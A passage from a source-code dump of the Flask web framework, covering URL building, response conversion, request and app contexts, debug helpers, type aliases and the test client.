but this requires setting :data:`SERVER_NAME` so Flask knows what domain to use. :data:`APPLICATION_ROOT` and :data:`PREFERRED_URL_SCHEME` should also be configured as needed. This config is only used when not in an active request. Functions can be decorated with :meth:`url_defaults` to modify keyword arguments before the URL is built. If building fails for some reason, such as an unknown endpoint or incorrect values, the app's :meth:`handle_url_build_error` method is called. If that returns a string, that is returned, otherwise a :exc:`~werkzeug.routing.BuildError` is raised. :param endpoint: The endpoint name associated with the URL to generate. If this starts with a ``.``, the current blueprint name (if any) will be used. :param _anchor: If given, append this as ``#anchor`` to the URL. :param _method: If given, generate the URL associated with this method for the endpoint. :param _scheme: If given, the URL will have this scheme if it is external. :param _external: If given, prefer the URL to be internal (False) or require it to be external (True). External URLs include the scheme and domain. When not in an active request, URLs are external by default. :param values: Values to use for the variable parts of the URL rule. Unknown keys are appended as query string arguments, like ``?a=b&c=d``. .. versionadded:: 2.2 Moved from ``flask.url_for``, which calls this method. """ req_ctx = _cv_request.get(None) if req_ctx is not None: url_adapter = req_ctx.url_adapter blueprint_name = req_ctx.request.blueprint # If the endpoint starts with "." and the request matches a # blueprint, the endpoint is relative to the blueprint. if endpoint[:1] == ".": if blueprint_name is not None: endpoint = f"{blueprint_name}{endpoint}" else: endpoint = endpoint[1:] # When in a request, generate a URL without scheme and # domain by default, unless a scheme is given. if _external is None: _external = _scheme is not None else: app_ctx = _cv_app.get(None) # If called by helpers.url_for, an app context is active, # use its url_adapter. Otherwise, app.url_for was called # directly, build an adapter. if app_ctx is not None: url_adapter = app_ctx.url_adapter else: url_adapter = self.create_url_adapter(None) if url_adapter is None: raise RuntimeError( "Unable to build URLs outside an active request" " without 'SERVER_NAME' configured. Also configure" " 'APPLICATION_ROOT' and 'PREFERRED_URL_SCHEME' as" " needed." ) # When outside a request, generate a URL with scheme and # domain by default. if _external is None: _external = True # It is an error to set _scheme when _external=False, in order # to avoid accidental insecure URLs. if _scheme is not None and not _external: raise ValueError("When specifying '_scheme', '_external' must be True.") self.inject_url_defaults(endpoint, values) try: rv = url_adapter.build( # type: ignore[union-attr] endpoint, values, method=_method, url_scheme=_scheme, force_external=_external, ) except BuildError as error: values.update( _anchor=_anchor, _method=_method, _scheme=_scheme, _external=_external ) return self.handle_url_build_error(error, endpoint, values) if _anchor is not None: _anchor = _url_quote(_anchor, safe="%!#$&'()*+,/:;=?@") rv = f"{rv}#{_anchor}" return rv def make_response(self, rv: ft.ResponseReturnValue) -> Response: """Convert the return value from a view function to an instance of :attr:`response_class`. :param rv: the return value from the view function. The view function must return a response. Returning ``None``, or the view ending without returning, is not allowed. The following types are allowed for ``view_rv``: ``str`` A response object is created with the string encoded to UTF-8 as the body. ``bytes`` A response object is created with the bytes as the body. ``dict`` A dictionary that will be jsonify'd before being returned. ``list`` A list that will be jsonify'd before being returned. ``generator`` or ``iterator`` A generator that returns ``str`` or ``bytes`` to be streamed as the response. ``tuple`` Either ``(body, status, headers)``, ``(body, status)``, or ``(body, headers)``, where ``body`` is any of the other types allowed here, ``status`` is a string or an integer, and ``headers`` is a dictionary or a list of ``(key, value)`` tuples. If ``body`` is a :attr:`response_class` instance, ``status`` overwrites the exiting value and ``headers`` are extended. :attr:`response_class` The object is returned unchanged. other :class:`~werkzeug.wrappers.Response` class The object is coerced to :attr:`response_class`. :func:`callable` The function is called as a WSGI application. The result is used to create a response object. .. versionchanged:: 2.2 A generator will be converted to a streaming response. A list will be converted to a JSON response. .. versionchanged:: 1.1 A dict will be converted to a JSON response. .. versionchanged:: 0.9 Previously a tuple was interpreted as the arguments for the response object. """ status = headers = None # unpack tuple returns if isinstance(rv, tuple): len_rv = len(rv) # a 3-tuple is unpacked directly if len_rv == 3: rv, status, headers = rv # type: ignore[misc] # decide if a 2-tuple has status or headers elif len_rv == 2: if isinstance(rv[1], (Headers, dict, tuple, list)): rv, headers = rv else: rv, status = rv # type: ignore[assignment,misc] # other sized tuples are not allowed else: raise TypeError( "The view function did not return a valid response tuple." " The tuple must have the form (body, status, headers)," " (body, status), or (body, headers)." ) # the body must not be None if rv is None: raise TypeError( f"The view function for {request.endpoint!r} did not" " return a valid response. The function either returned" " None or ended without a return statement." ) # make sure the body is an instance of the response class if not isinstance(rv, self.response_class): if isinstance(rv, (str, bytes, bytearray)) or isinstance(rv, cabc.Iterator): # let the response class set the status and headers instead of # waiting to do it manually, so that the class can handle any # special logic rv = self.response_class( rv, status=status, headers=headers, # type: ignore[arg-type] ) status = headers = None elif isinstance(rv, (dict, list)): rv = self.json.response(rv) elif isinstance(rv, BaseResponse) or callable(rv): # evaluate a WSGI callable, or coerce a different response # class to the correct type try: rv = self.response_class.force_type( rv, # type: ignore[arg-type] request.environ, ) except TypeError as e: raise TypeError( f"{e}\nThe view function did not return a valid" " response. The return type must be a string," " dict, list, tuple with headers or status," " Response instance, or WSGI callable, but it" f" was a {type(rv).__name__}." ).with_traceback(sys.exc_info()[2]) from None else: raise TypeError( "The view function did not return a valid" " response. The return type must be a string," " dict, list, tuple with headers or status," " Response instance, or WSGI callable, but it was a" f" {type(rv).__name__}." ) rv = t.cast(Response, rv) # prefer the status if it was provided if status is not None: if isinstance(status, (str, bytes, bytearray)): rv.status = status else: rv.status_code = status # extend existing headers with provided headers if headers: rv.headers.update(headers) # type: ignore[arg-type] return rv def preprocess_request(self) -> ft.ResponseReturnValue | None: """Called before the request is dispatched. Calls :attr:`url_value_preprocessors` registered with the app and the current blueprint (if any). Then calls :attr:`before_request_funcs` registered with the app and the blueprint. If any :meth:`before_request` handler returns a non-None value, the value is handled as if it was the return value from the view, and further request handling is stopped. """ names = (None, *reversed(request.blueprints)) for name in names: if name in self.url_value_preprocessors: for url_func in self.url_value_preprocessors[name]: url_func(request.endpoint, request.view_args) for name in names: if name in self.before_request_funcs: for before_func in self.before_request_funcs[name]: rv = self.ensure_sync(before_func)() if rv is not None: return rv # type: ignore[no-any-return] return None def process_response(self, response: Response) -> Response: """Can be overridden in order to modify the response object before it's sent to the WSGI server. By default this will call all the :meth:`after_request` decorated functions. .. versionchanged:: 0.5 As of Flask 0.5 the functions registered for after request execution are called in reverse order of registration. :param response: a :attr:`response_class` object. :return: a new response object or the same, has to be an instance of :attr:`response_class`. """ ctx = request_ctx._get_current_object() # type: ignore[attr-defined] for func in ctx._after_request_functions: response = self.ensure_sync(func)(response) for name in chain(request.blueprints, (None,)): if name in self.after_request_funcs: for func in reversed(self.after_request_funcs[name]): response = self.ensure_sync(func)(response) if not self.session_interface.is_null_session(ctx.session): self.session_interface.save_session(self, ctx.session, response) return response def do_teardown_request( self, exc: BaseException | None = _sentinel, # type: ignore[assignment] ) -> None: """Called after the request is dispatched and the response is returned, right before the request context is popped. This calls all functions decorated with :meth:`teardown_request`, and :meth:`Blueprint.teardown_request` if a blueprint handled the request. Finally, the :data:`request_tearing_down` signal is sent. This is called by :meth:`RequestContext.pop() <flask.ctx.RequestContext.pop>`, which may be delayed during testing to maintain access to resources. :param exc: An unhandled exception raised while dispatching the request. Detected from the current exception information if not passed. Passed to each teardown function. .. versionchanged:: 0.9 Added the ``exc`` argument. """ if exc is _sentinel: exc = sys.exc_info()[1] for name in chain(request.blueprints, (None,)): if name in self.teardown_request_funcs: for func in reversed(self.teardown_request_funcs[name]): self.ensure_sync(func)(exc) request_tearing_down.send(self, _async_wrapper=self.ensure_sync, exc=exc) def do_teardown_appcontext( self, exc: BaseException | None = _sentinel, # type: ignore[assignment] ) -> None: """Called right before the application context is popped. When handling a request, the application context is popped after the request context. See :meth:`do_teardown_request`. This calls all functions decorated with :meth:`teardown_appcontext`. Then the :data:`appcontext_tearing_down` signal is sent. This is called by :meth:`AppContext.pop() <flask.ctx.AppContext.pop>`. .. versionadded:: 0.9 """ if exc is _sentinel: exc = sys.exc_info()[1] for func in reversed(self.teardown_appcontext_funcs): self.ensure_sync(func)(exc) appcontext_tearing_down.send(self, _async_wrapper=self.ensure_sync, exc=exc) def app_context(self) -> AppContext: """Create an :class:`~flask.ctx.AppContext`. Use as a ``with`` block to push the context, which will make :data:`current_app` point at this application. An application context is automatically pushed by :meth:`RequestContext.push() <flask.ctx.RequestContext.push>` when handling a request, and when running a CLI command. Use this to manually create a context outside of these situations. :: with app.app_context(): init_db() See :doc:`/appcontext`. .. versionadded:: 0.9 """ return AppContext(self) def request_context(self, environ: WSGIEnvironment) -> RequestContext: """Create a :class:`~flask.ctx.RequestContext` representing a WSGI environment. Use a ``with`` block to push the context, which will make :data:`request` point at this request. See :doc:`/reqcontext`. Typically you should not call this from your own code. A request context is automatically pushed by the :meth:`wsgi_app` when handling a request. Use :meth:`test_request_context` to create an environment and context instead of this method. :param environ: a WSGI environment """ return RequestContext(self, environ) def test_request_context(self, *args: t.Any, **kwargs: t.Any) -> RequestContext: """Create a :class:`~flask.ctx.RequestContext` for a WSGI environment created from the given values. This is mostly useful during testing, where you may want to run a function that uses request data without dispatching a full request. See :doc:`/reqcontext`. Use a ``with`` block to push the context, which will make :data:`request` point at the request for the created environment. :: with app.test_request_context(...): generate_report() When using the shell, it may be easier to push and pop the context manually to avoid indentation. :: ctx = app.test_request_context(...) ctx.push() ... ctx.pop() Takes the same arguments as Werkzeug's :class:`~werkzeug.test.EnvironBuilder`, with some defaults from the application. See the linked Werkzeug docs for most of the available arguments. Flask-specific behavior is listed here. :param path: URL path being requested. :param base_url: Base URL where the app is being served, which ``path`` is relative to. If not given, built from :data:`PREFERRED_URL_SCHEME`, ``subdomain``, :data:`SERVER_NAME`, and :data:`APPLICATION_ROOT`. :param subdomain: Subdomain name to append to :data:`SERVER_NAME`. :param url_scheme: Scheme to use instead of :data:`PREFERRED_URL_SCHEME`. :param data: The request body, either as a string or a dict of form keys and values. :param json: If given, this is serialized as JSON and passed as ``data``. Also defaults ``content_type`` to ``application/json``. :param args: other positional arguments passed to :class:`~werkzeug.test.EnvironBuilder`. :param kwargs: other keyword arguments passed to :class:`~werkzeug.test.EnvironBuilder`. """ from .testing import EnvironBuilder builder = EnvironBuilder(self, *args, **kwargs) try: return self.request_context(builder.get_environ()) finally: builder.close() def wsgi_app( self, environ: WSGIEnvironment, start_response: StartResponse ) -> cabc.Iterable[bytes]: """The actual WSGI application. This is not implemented in :meth:`__call__` so that middlewares can be applied without losing a reference to the app object. Instead of doing this:: app = MyMiddleware(app) It's a better idea to do this instead:: app.wsgi_app = MyMiddleware(app.wsgi_app) Then you still have the original application object around and can continue to call methods on it. .. versionchanged:: 0.7 Teardown events for the request and app contexts are called even if an unhandled error occurs. Other events may not be called depending on when an error occurs during dispatch. See :ref:`callbacks-and-errors`. :param environ: A WSGI environment. :param start_response: A callable accepting a status code, a list of headers, and an optional exception context to start the response. """ ctx = self.request_context(environ) error: BaseException | None = None try: try: ctx.push() response = self.full_dispatch_request() except Exception as e: error = e response = self.handle_exception(e) except: # noqa: B001 error = sys.exc_info()[1] raise return response(environ, start_response) finally: if "werkzeug.debug.preserve_context" in environ: environ["werkzeug.debug.preserve_context"](_cv_app.get()) environ["werkzeug.debug.preserve_context"](_cv_request.get()) if error is not None and self.should_ignore_error(error): error = None ctx.pop(error) def __call__( self, environ: WSGIEnvironment, start_response: StartResponse ) -> cabc.Iterable[bytes]: """The WSGI server calls the Flask application object as the WSGI application. This calls :meth:`wsgi_app`, which can be wrapped to apply middleware. """ return self.wsgi_app(environ, start_response) File: src/flask/debughelpers.py from __future__ import annotations import typing as t from jinja2.loaders import BaseLoader from werkzeug.routing import RequestRedirect from .blueprints import Blueprint from .globals import request_ctx from .sansio.app import App if t.TYPE_CHECKING: from .sansio.scaffold import Scaffold from .wrappers import Request class UnexpectedUnicodeError(AssertionError, UnicodeError): """Raised in places where we want some better error reporting for unexpected unicode or binary data. """ class DebugFilesKeyError(KeyError, AssertionError): """Raised from request.files during debugging. The idea is that it can provide a better error message than just a generic KeyError/BadRequest. """ def __init__(self, request: Request, key: str) -> None: form_matches = request.form.getlist(key) buf = [ f"You tried to access the file {key!r} in the request.files" " dictionary but it does not exist. The mimetype for the" f" request is {request.mimetype!r} instead of" " 'multipart/form-data' which means that no file contents" " were transmitted. To fix this error you should provide" ' enctype="multipart/form-data" in your form.' ] if form_matches: names = ", ".join(repr(x) for x in form_matches) buf.append( "\n\nThe browser instead transmitted some file names. " f"This was submitted: {names}" ) self.msg = "".join(buf) def __str__(self) -> str: return self.msg class FormDataRoutingRedirect(AssertionError): """This exception is raised in debug mode if a routing redirect would cause the browser to drop the method or body. This happens when method is not GET, HEAD or OPTIONS and the status code is not 307 or 308. """ def __init__(self, request: Request) -> None: exc = request.routing_exception assert isinstance(exc, RequestRedirect) buf = [ f"A request was sent to '{request.url}', but routing issued" f" a redirect to the canonical URL '{exc.new_url}'." ] if f"{request.base_url}/" == exc.new_url.partition("?")[0]: buf.append( " The URL was defined with a trailing slash. Flask" " will redirect to the URL with a trailing slash if it" " was accessed without one." ) buf.append( " Send requests to the canonical URL, or use 307 or 308 for" " routing redirects. Otherwise, browsers will drop form" " data.\n\n" "This exception is only raised in debug mode." ) super().__init__("".join(buf)) def attach_enctype_error_multidict(request: Request) -> None: """Patch ``request.files.__getitem__`` to raise a descriptive error about ``enctype=multipart/form-data``. :param request: The request to patch. :meta private: """ oldcls = request.files.__class__ class newcls(oldcls): # type: ignore[valid-type, misc] def __getitem__(self, key: str) -> t.Any: try: return super().__getitem__(key) except KeyError as e: if key not in request.form: raise raise DebugFilesKeyError(request, key).with_traceback( e.__traceback__ ) from None newcls.__name__ = oldcls.__name__ newcls.__module__ = oldcls.__module__ request.files.__class__ = newcls def _dump_loader_info(loader: BaseLoader) -> t.Iterator[str]: yield f"class: {type(loader).__module__}.{type(loader).__name__}" for key, value in sorted(loader.__dict__.items()): if key.startswith("_"): continue if isinstance(value, (tuple, list)): if not all(isinstance(x, str) for x in value): continue yield f"{key}:" for item in value: yield f" - {item}" continue elif not isinstance(value, (str, int, float, bool)): continue yield f"{key}: {value!r}" def explain_template_loading_attempts( app: App, template: str, attempts: list[ tuple[ BaseLoader, Scaffold, tuple[str, str | None, t.Callable[[], bool] | None] | None, ] ], ) -> None: """This should help developers understand what failed""" info = [f"Locating template {template!r}:"] total_found = 0 blueprint = None if request_ctx and request_ctx.request.blueprint is not None: blueprint = request_ctx.request.blueprint for idx, (loader, srcobj, triple) in enumerate(attempts): if isinstance(srcobj, App): src_info = f"application {srcobj.import_name!r}" elif isinstance(srcobj, Blueprint): src_info = f"blueprint {srcobj.name!r} ({srcobj.import_name})" else: src_info = repr(srcobj) info.append(f"{idx + 1:5}: trying loader of {src_info}") for line in _dump_loader_info(loader): info.append(f" {line}") if triple is None: detail = "no match" else: detail = f"found ({triple[1] or '<string>'!r})" total_found += 1 info.append(f" -> {detail}") seems_fishy = False if total_found == 0: info.append("Error: the template could not be found.") seems_fishy = True elif total_found > 1: info.append("Warning: multiple loaders returned a match for the template.") seems_fishy = True if blueprint is not None and seems_fishy: info.append( " The template was looked up from an endpoint that belongs" f" to the blueprint {blueprint!r}." ) info.append(" Maybe you did not place a template in the right folder?") info.append(" See https://flask.palletsprojects.com/blueprints/#templates") app.logger.info("\n".join(info)) File: src/flask/ctx.py from __future__ import annotations import contextvars import sys import typing as t from functools import update_wrapper from types import TracebackType from werkzeug.exceptions import HTTPException from . import typing as ft from .globals import _cv_app from .globals import _cv_request from .signals import appcontext_popped from .signals import appcontext_pushed if t.TYPE_CHECKING: # pragma: no cover from _typeshed.wsgi import WSGIEnvironment from .app import Flask from .sessions import SessionMixin from .wrappers import Request # a singleton sentinel value for parameter defaults _sentinel = object() class _AppCtxGlobals: """A plain object. Used as a namespace for storing data during an application context. Creating an app context automatically creates this object, which is made available as the :data:`g` proxy. .. describe:: 'key' in g Check whether an attribute is present. .. versionadded:: 0.10 .. describe:: iter(g) Return an iterator over the attribute names. .. versionadded:: 0.10 """ # Define attr methods to let mypy know this is a namespace object # that has arbitrary attributes. def __getattr__(self, name: str) -> t.Any: try: return self.__dict__[name] except KeyError: raise AttributeError(name) from None def __setattr__(self, name: str, value: t.Any) -> None: self.__dict__[name] = value def __delattr__(self, name: str) -> None: try: del self.__dict__[name] except KeyError: raise AttributeError(name) from None def get(self, name: str, default: t.Any | None = None) -> t.Any: """Get an attribute by name, or a default value. Like :meth:`dict.get`. :param name: Name of attribute to get. :param default: Value to return if the attribute is not present. .. versionadded:: 0.10 """ return self.__dict__.get(name, default) def pop(self, name: str, default: t.Any = _sentinel) -> t.Any: """Get and remove an attribute by name. Like :meth:`dict.pop`. :param name: Name of attribute to pop. :param default: Value to return if the attribute is not present, instead of raising a ``KeyError``. .. versionadded:: 0.11 """ if default is _sentinel: return self.__dict__.pop(name) else: return self.__dict__.pop(name, default) def setdefault(self, name: str, default: t.Any = None) -> t.Any: """Get the value of an attribute if it is present, otherwise set and return a default value. Like :meth:`dict.setdefault`. :param name: Name of attribute to get. :param default: Value to set and return if the attribute is not present. .. versionadded:: 0.11 """ return self.__dict__.setdefault(name, default) def __contains__(self, item: str) -> bool: return item in self.__dict__ def __iter__(self) -> t.Iterator[str]: return iter(self.__dict__) def __repr__(self) -> str: ctx = _cv_app.get(None) if ctx is not None: return f"<flask.g of '{ctx.app.name}'>" return object.__repr__(self) def after_this_request( f: ft.AfterRequestCallable[t.Any], ) -> ft.AfterRequestCallable[t.Any]: """Executes a function after this request. This is useful to modify response objects. The function is passed the response object and has to return the same or a new one. Example:: @app.route('/') def index(): @after_this_request def add_header(response): response.headers['X-Foo'] = 'Parachute' return response return 'Hello World!' This is more useful if a function other than the view function wants to modify a response. For instance think of a decorator that wants to add some headers without converting the return value into a response object. .. versionadded:: 0.9 """ ctx = _cv_request.get(None) if ctx is None: raise RuntimeError( "'after_this_request' can only be used when a request" " context is active, such as in a view function." ) ctx._after_request_functions.append(f) return f F = t.TypeVar("F", bound=t.Callable[..., t.Any]) def copy_current_request_context(f: F) -> F: """A helper function that decorates a function to retain the current request context. This is useful when working with greenlets. The moment the function is decorated a copy of the request context is created and then pushed when the function is called. The current session is also included in the copied request context. Example:: import gevent from flask import copy_current_request_context @app.route('/') def index(): @copy_current_request_context def do_some_work(): # do some work here, it can access flask.request or # flask.session like you would otherwise in the view function. ... gevent.spawn(do_some_work) return 'Regular response' .. versionadded:: 0.10 """ ctx = _cv_request.get(None) if ctx is None: raise RuntimeError( "'copy_current_request_context' can only be used when a" " request context is active, such as in a view function." ) ctx = ctx.copy() def wrapper(*args: t.Any, **kwargs: t.Any) -> t.Any: with ctx: # type: ignore[union-attr] return ctx.app.ensure_sync(f)(*args, **kwargs) # type: ignore[union-attr] return update_wrapper(wrapper, f) # type: ignore[return-value] def has_request_context() -> bool: """If you have code that wants to test if a request context is there or not this function can be used. For instance, you may want to take advantage of request information if the request object is available, but fail silently if it is unavailable. :: class User(db.Model): def __init__(self, username, remote_addr=None): self.username = username if remote_addr is None and has_request_context(): remote_addr = request.remote_addr self.remote_addr = remote_addr Alternatively you can also just test any of the context bound objects (such as :class:`request` or :class:`g`) for truthness:: class User(db.Model): def __init__(self, username, remote_addr=None): self.username = username if remote_addr is None and request: remote_addr = request.remote_addr self.remote_addr = remote_addr .. versionadded:: 0.7 """ return _cv_request.get(None) is not None def has_app_context() -> bool: """Works like :func:`has_request_context` but for the application context. You can also just do a boolean check on the :data:`current_app` object instead. .. versionadded:: 0.9 """ return _cv_app.get(None) is not None class AppContext: """The app context contains application-specific information. An app context is created and pushed at the beginning of each request if one is not already active. An app context is also pushed when running CLI commands. """ def __init__(self, app: Flask) -> None: self.app = app self.url_adapter = app.create_url_adapter(None) self.g: _AppCtxGlobals = app.app_ctx_globals_class() self._cv_tokens: list[contextvars.Token[AppContext]] = [] def push(self) -> None: """Binds the app context to the current context.""" self._cv_tokens.append(_cv_app.set(self)) appcontext_pushed.send(self.app, _async_wrapper=self.app.ensure_sync) def pop(self, exc: BaseException | None = _sentinel) -> None: # type: ignore """Pops the app context.""" try: if len(self._cv_tokens) == 1: if exc is _sentinel: exc = sys.exc_info()[1] self.app.do_teardown_appcontext(exc) finally: ctx = _cv_app.get() _cv_app.reset(self._cv_tokens.pop()) if ctx is not self: raise AssertionError( f"Popped wrong app context. ({ctx!r} instead of {self!r})" ) appcontext_popped.send(self.app, _async_wrapper=self.app.ensure_sync) def __enter__(self) -> AppContext: self.push() return self def __exit__( self, exc_type: type | None, exc_value: BaseException | None, tb: TracebackType | None, ) -> None: self.pop(exc_value) class RequestContext: """The request context contains per-request information. The Flask app creates and pushes it at the beginning of the request, then pops it at the end of the request. It will create the URL adapter and request object for the WSGI environment provided. Do not attempt to use this class directly, instead use :meth:`~flask.Flask.test_request_context` and :meth:`~flask.Flask.request_context` to create this object. When the request context is popped, it will evaluate all the functions registered on the application for teardown execution (:meth:`~flask.Flask.teardown_request`). The request context is automatically popped at the end of the request. When using the interactive debugger, the context will be restored so ``request`` is still accessible. Similarly, the test client can preserve the context after the request ends. However, teardown functions may already have closed some resources such as database connections. """ def __init__( self, app: Flask, environ: WSGIEnvironment, request: Request | None = None, session: SessionMixin | None = None, ) -> None: self.app = app if request is None: request = app.request_class(environ) request.json_module = app.json self.request: Request = request self.url_adapter = None try: self.url_adapter = app.create_url_adapter(self.request) except HTTPException as e: self.request.routing_exception = e self.flashes: list[tuple[str, str]] | None = None self.session: SessionMixin | None = session # Functions that should be executed after the request on the response # object. These will be called before the regular "after_request" # functions. self._after_request_functions: list[ft.AfterRequestCallable[t.Any]] = [] self._cv_tokens: list[ tuple[contextvars.Token[RequestContext], AppContext | None] ] = [] def copy(self) -> RequestContext: """Creates a copy of this request context with the same request object. This can be used to move a request context to a different greenlet. Because the actual request object is the same this cannot be used to move a request context to a different thread unless access to the request object is locked. .. versionadded:: 0.10 .. versionchanged:: 1.1 The current session object is used instead of reloading the original data. This prevents `flask.session` pointing to an out-of-date object. """ return self.__class__( self.app, environ=self.request.environ, request=self.request, session=self.session, ) def match_request(self) -> None: """Can be overridden by a subclass to hook into the matching of the request. """ try: result = self.url_adapter.match(return_rule=True) # type: ignore self.request.url_rule, self.request.view_args = result # type: ignore except HTTPException as e: self.request.routing_exception = e def push(self) -> None: # Before we push the request context we have to ensure that there # is an application context. app_ctx = _cv_app.get(None) if app_ctx is None or app_ctx.app is not self.app: app_ctx = self.app.app_context() app_ctx.push() else: app_ctx = None self._cv_tokens.append((_cv_request.set(self), app_ctx)) # Open the session at the moment that the request context is available. # This allows a custom open_session method to use the request context. # Only open a new session if this is the first time the request was # pushed, otherwise stream_with_context loses the session. if self.session is None: session_interface = self.app.session_interface self.session = session_interface.open_session(self.app, self.request) if self.session is None: self.session = session_interface.make_null_session(self.app) # Match the request URL after loading the session, so that the # session is available in custom URL converters. if self.url_adapter is not None: self.match_request() def pop(self, exc: BaseException | None = _sentinel) -> None: # type: ignore """Pops the request context and unbinds it by doing that. This will also trigger the execution of functions registered by the :meth:`~flask.Flask.teardown_request` decorator. .. versionchanged:: 0.9 Added the `exc` argument. """ clear_request = len(self._cv_tokens) == 1 try: if clear_request: if exc is _sentinel: exc = sys.exc_info()[1] self.app.do_teardown_request(exc) request_close = getattr(self.request, "close", None) if request_close is not None: request_close() finally: ctx = _cv_request.get() token, app_ctx = self._cv_tokens.pop() _cv_request.reset(token) # get rid of circular dependencies at the end of the request # so that we don't require the GC to be active. if clear_request: ctx.request.environ["werkzeug.request"] = None if app_ctx is not None: app_ctx.pop(exc) if ctx is not self: raise AssertionError( f"Popped wrong request context. ({ctx!r} instead of {self!r})" ) def __enter__(self) -> RequestContext: self.push() return self def __exit__( self, exc_type: type | None, exc_value: BaseException | None, tb: TracebackType | None, ) -> None: self.pop(exc_value) def __repr__(self) -> str: return ( f"<{type(self).__name__} {self.request.url!r}" f" [{self.request.method}] of {self.app.name}>" ) File: src/flask/typing.py from __future__ import annotations import typing as t if t.TYPE_CHECKING: # pragma: no cover from _typeshed.wsgi import WSGIApplication # noqa: F401 from werkzeug.datastructures import Headers # noqa: F401 from werkzeug.sansio.response import Response # noqa: F401 # The possible types that are directly convertible or are a Response object. ResponseValue = t.Union[ "Response", str, bytes, t.List[t.Any], # Only dict is actually accepted, but Mapping allows for TypedDict. t.Mapping[str, t.Any], t.Iterator[str], t.Iterator[bytes], ] # the possible types for an individual HTTP header # This should be a Union, but mypy doesn't pass unless it's a TypeVar. HeaderValue = t.Union[str, t.List[str], t.Tuple[str, ...]] # the possible types for HTTP headers HeadersValue = t.Union[ "Headers", t.Mapping[str, HeaderValue], t.Sequence[t.Tuple[str, HeaderValue]], ] # The possible types returned by a route function. ResponseReturnValue = t.Union[ ResponseValue, t.Tuple[ResponseValue, HeadersValue], t.Tuple[ResponseValue, int], t.Tuple[ResponseValue, int, HeadersValue], "WSGIApplication", ] # Allow any subclass of werkzeug.Response, such as the one from Flask, # as a callback argument. Using werkzeug.Response directly makes a # callback annotated with flask.Response fail type checking. ResponseClass = t.TypeVar("ResponseClass", bound="Response") AppOrBlueprintKey = t.Optional[str] # The App key is None, whereas blueprints are named AfterRequestCallable = t.Union[ t.Callable[[ResponseClass], ResponseClass], t.Callable[[ResponseClass], t.Awaitable[ResponseClass]], ] BeforeFirstRequestCallable = t.Union[ t.Callable[[], None], t.Callable[[], t.Awaitable[None]] ] BeforeRequestCallable = t.Union[ t.Callable[[], t.Optional[ResponseReturnValue]], t.Callable[[], t.Awaitable[t.Optional[ResponseReturnValue]]], ] ShellContextProcessorCallable = t.Callable[[], t.Dict[str, t.Any]] TeardownCallable = t.Union[ t.Callable[[t.Optional[BaseException]], None], t.Callable[[t.Optional[BaseException]], t.Awaitable[None]], ] TemplateContextProcessorCallable = t.Union[ t.Callable[[], t.Dict[str, t.Any]], t.Callable[[], t.Awaitable[t.Dict[str, t.Any]]], ] TemplateFilterCallable = t.Callable[..., t.Any] TemplateGlobalCallable = t.Callable[..., t.Any] TemplateTestCallable = t.Callable[..., bool] URLDefaultCallable = t.Callable[[str, t.Dict[str, t.Any]], None] URLValuePreprocessorCallable = t.Callable[ [t.Optional[str], t.Optional[t.Dict[str, t.Any]]], None ] # This should take Exception, but that either breaks typing the argument # with a specific exception, or decorating multiple times with different # exceptions (and using a union type on the argument). # https://github.com/pallets/flask/issues/4095 # https://github.com/pallets/flask/issues/4295 # https://github.com/pallets/flask/issues/4297 ErrorHandlerCallable = t.Union[ t.Callable[[t.Any], ResponseReturnValue], t.Callable[[t.Any], t.Awaitable[ResponseReturnValue]], ] RouteCallable = t.Union[ t.Callable[..., ResponseReturnValue], t.Callable[..., t.Awaitable[ResponseReturnValue]], ] File: src/flask/testing.py from __future__ import annotations import importlib.metadata import typing as t from contextlib import contextmanager from contextlib import ExitStack from copy import copy from types import TracebackType from urllib.parse import urlsplit import werkzeug.test from click.testing import CliRunner from werkzeug.test import Client from werkzeug.wrappers import Request as BaseRequest from .cli import ScriptInfo from .sessions import SessionMixin if t.TYPE_CHECKING: # pragma: no cover from _typeshed.wsgi import WSGIEnvironment from werkzeug.test import TestResponse from .app import Flask class EnvironBuilder(werkzeug.test.EnvironBuilder): """An :class:`~werkzeug.test.EnvironBuilder`, that takes defaults from the application. :param app: The Flask application to configure the environment from. :param path: URL path being requested. :param base_url: Base URL where the app is being served, which ``path`` is relative to. If not given, built from :data:`PREFERRED_URL_SCHEME`, ``subdomain``, :data:`SERVER_NAME`, and :data:`APPLICATION_ROOT`. :param subdomain: Subdomain name to append to :data:`SERVER_NAME`. :param url_scheme: Scheme to use instead of :data:`PREFERRED_URL_SCHEME`. :param json: If given, this is serialized as JSON and passed as ``data``. Also defaults ``content_type`` to ``application/json``. :param args: other positional arguments passed to :class:`~werkzeug.test.EnvironBuilder`. :param kwargs: other keyword arguments passed to :class:`~werkzeug.test.EnvironBuilder`. """ def __init__( self, app: Flask, path: str = "/", base_url: str | None = None, subdomain: str | None = None, url_scheme: str | None = None, *args: t.Any, **kwargs: t.Any, ) -> None: assert not (base_url or subdomain or url_scheme) or ( base_url is not None ) != bool( subdomain or url_scheme ), 'Cannot pass "subdomain" or "url_scheme" with "base_url".' if base_url is None: http_host = app.config.get("SERVER_NAME") or "localhost" app_root = app.config["APPLICATION_ROOT"] if subdomain: http_host = f"{subdomain}.{http_host}" if url_scheme is None: url_scheme = app.config["PREFERRED_URL_SCHEME"] url = urlsplit(path) base_url = ( f"{url.scheme or url_scheme}://{url.netloc or http_host}" f"/{app_root.lstrip('/')}" ) path = url.path if url.query: sep = b"?" if isinstance(url.query, bytes) else "?" path += sep + url.query self.app = app super().__init__(path, base_url, *args, **kwargs) def json_dumps(self, obj: t.Any, **kwargs: t.Any) -> str: # type: ignore """Serialize ``obj`` to a JSON-formatted string. The serialization will be configured according to the config associated with this EnvironBuilder's ``app``. """ return self.app.json.dumps(obj, **kwargs) _werkzeug_version = "" def _get_werkzeug_version() -> str: global _werkzeug_version if not _werkzeug_version: _werkzeug_version = importlib.metadata.version("werkzeug") return _werkzeug_version class FlaskClient(Client): """Works like a regular Werkzeug test client but has knowledge about Flask's contexts to defer the cleanup of the request context until the end of a ``with`` block. For general information about how to use this class refer to :class:`werkzeug.test.Client`. .. versionchanged:: 0.12 `app.test_client()` includes preset default environment, which can be set after instantiation of the `app.test_client()` object in `client.environ_base`. Basic usage is outlined in the :doc:`/testing` chapter. """ application: Flask def __init__(self, *args: t.Any, **kwargs: t.Any) -> None: super().__init__(*args, **kwargs) self.preserve_context = False self._new_contexts: list[t.ContextManager[t.Any]] = [] self._context_stack = ExitStack() self.environ_base = { "REMOTE_ADDR": "127.0.0.1", "HTTP_USER_AGENT": f"Werkzeug/{_get_werkzeug_version()}", } @contextmanager def session_transaction( self, *args: t.Any, **kwargs: t.Any ) -> t.Iterator[SessionMixin]: """When used in combination with a ``with`` statement this opens a session transaction. This can be used to modify the session that the test client uses. Once the ``with`` block is left the session is 